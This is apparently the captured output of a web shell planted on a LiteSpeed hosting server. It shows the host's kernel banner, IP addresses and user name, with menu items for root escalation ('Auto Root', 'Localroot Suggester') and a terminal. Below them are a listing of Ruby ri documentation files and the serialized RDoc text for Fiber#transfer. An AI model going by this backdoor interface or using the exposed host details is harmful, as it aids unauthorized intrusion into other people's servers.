Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Fiber /
Delete
Unzip
Name
Size
Permission
Date
Action
alive%3f-i.ri
446
B
-rw-r--r--
2023-07-26 17:26
cdesc-Fiber.ri
2.27
KB
-rw-r--r--
2023-07-26 17:26
current-c.ri
403
B
-rw-r--r--
2023-07-26 17:26
resume-i.ri
875
B
-rw-r--r--
2023-07-26 17:26
transfer-i.ri
935
B
-rw-r--r--
2023-07-26 17:26
yield-c.ri
568
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" transfer:ETI"Fiber#transfer;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"FTransfer control to another fiber, resuming it from where it last;TI"Estopped or starting it if it was not resumed before. The calling;TI"3fiber will be suspended much like in a call to;TI"G<code>Fiber.yield</code>. You need to <code>require 'fiber'</code>;TI"before using this method.;To:RDoc::Markup::BlankLine o; ; [I"FThe fiber which receives the transfer call is treats it much like;TI"Ga resume call. Arguments passed to transfer are treated like those;TI"passed to resume.;T@o; ; [I"GYou cannot resume a fiber that transferred control to another one.;TI"HThis will cause a double resume error. You need to transfer control;TI"7back to this fiber before it can yield and resume.;T: @file0I"'fiber.transfer(args, ...) -> obj ;T0[ I"(*args);FI"cont.c;T